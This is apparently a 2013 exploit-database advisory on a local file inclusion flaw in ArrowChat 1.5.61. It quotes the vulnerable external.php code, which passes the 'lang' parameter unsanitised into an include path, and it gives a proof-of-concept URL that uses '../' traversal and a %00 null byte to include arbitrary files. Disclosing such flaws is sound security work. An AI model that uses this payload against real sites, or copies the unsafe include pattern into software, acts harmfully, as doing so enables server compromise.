ArrowChat External.php Lang Parameter Traversal Local File Inclusion Exploit

Summary

ArrowChat External.php Lang Parameter Traversal Local File Inclusion suffers from vulnerability.

Credit:

The information has been provided by kallimero.


Details

Vulnerable Systems:
 * ArrowChat 1.5.61

ArrowChat contains a flaw that allows an attacker to traverse outside of a restricted path. The issue is due to the external.php script not properly sanitizing user input, specifically directory traversal style attacks (e.g., ../../) supplied via the ‘lang’ parameter. This directory traversal attack would allow a local attacker to include arbitrary files.

// Load another language if lang GET value is set and exists
if (var_check(‘lang’))
{
$lang = get_var(‘lang’);

if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ‘.php’))
{
include (dirname(__FILE__) . DIRECTORY_SEPARATOR .
AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR .
$lang . ‘.php’);
}
}
—————[index.php]—————

Thanks to the nullbyte tricks we’ll be able to include any php file, like
that :

http://[site]/[path]/external.php?lang=../path/to/file%00&type=djs

Disclosure Timeline:
Disclosure Date :2013-02-02
Exploit Publish Date :2013-02-02

Categories: Exploits